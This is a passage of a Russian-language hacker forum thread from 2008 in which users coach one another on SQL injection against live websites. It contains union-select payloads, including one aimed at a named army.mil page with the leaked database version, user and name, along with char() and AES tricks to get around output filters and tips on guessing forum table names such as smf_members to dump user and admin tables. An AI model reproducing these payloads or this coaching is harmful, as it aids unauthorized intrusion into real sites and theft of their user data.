 |
|
24.02.2008, 21:08
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами:
10374086
Репутация:
1745
|
|
Скиньте мне свой номер осику в ПМ я вам стукну и все объясню...
|
|
|
24.02.2008, 21:21
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
2 ~Taxa~
если цифры из запроса выводятся то попробуй
aes_decrypt(aes_encrypt(login,0x71),0x71)
ну а чтобы Piflit не ругал меня можешь привести к char  |
|
|
|
24.02.2008, 21:33
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
Хотелось конечно самому разобраться, но Спасибо! Если не затруднит объясните откуда взяли именно это название таблицы(т.к я подбирал несколько часов и ни на что толковое не наткнулся), а вы за несколько минут
smf_members - это стандартное название таблицы с префиксом по-умолчанию у форумов на движке simple machines.
_http://someshit.net/as3f13asf21/ - стандартные таблицы движков, и поля к ним.
|
|
|
|
24.02.2008, 21:35
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
Сообщение от ~Taxa~
Piflit я знаю видел что там зареганно 10к усеров, и еще не только таблица admin но также и другие. Мне не верится что все таблицы пустые (
таблица admin может быть пустая, а реальные админы быть в таблице realXadmin. так иногда делают)
|
|
|
|
24.02.2008, 22:10
|
|
Новичок
Регистрация: 24.01.2008
Сообщений: 20
С нами:
9630275
Репутация:
15
|
|
ну ладно на админов забъем... А что насчет таблицы users ...
jokester спасибо щас попробуем...
|
|
|
|
24.02.2008, 23:11
|
|
Новичок
Регистрация: 24.01.2008
Сообщений: 20
С нами:
9630275
Репутация:
15
|
|
jokester
короче сделал так:
www.site.ru/index.php?id=-1,2,char(105, 109),4,5+from+users/*
то мне выводит IM хотя я сам защифровал это слово в char
AES_DECRYPT не помогает ( что можно еще сделать*?
|
|
|
|
24.02.2008, 23:16
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
~Taxa~, скинь ссылку сюда или мне в пм (если стесняешься:d), а то я чуствую тебе щас тут насоветуют.
|
|
|
|
24.02.2008, 23:27
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
2 ~Taxa~
Slip прав без ссылки трудно советовать если отправишь ему отпишите что было,а то я переживаю
|
|
|
|
24.02.2008, 23:37
|
|
Познающий
Регистрация: 02.06.2007
Сообщений: 39
С нами:
9970148
Репутация:
15
|
|
Народ подскажите плиз что даёт к примеру это -http://www4.army.mil/otf/story.php?id=-56/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.22-log
otf_web_user@localhost
otf
интересует зачем пишут вот это -
4.1.22-log
otf_web_user@localhost
otf
и как это можно использавать ?
Спасибо !
|
|
|
|
24.02.2008, 23:41
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
интересует зачем пишут вот это -
4.1.22-log
otf_web_user@localhost
otf
и как это можно использавать ?
1. Версия. Если >5 , то хэк упрощается системной информацией о структуре бд.
2. Пользователь. От какого пользователя в данный момент работает бд. Так же помогает вытягивать информацию из mysq.user с помощью "where".
3. Название БД (насколько я понял своим телепатизмом). Опять же если ветка >5, упрощает взлом. Так же используется с "where".
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
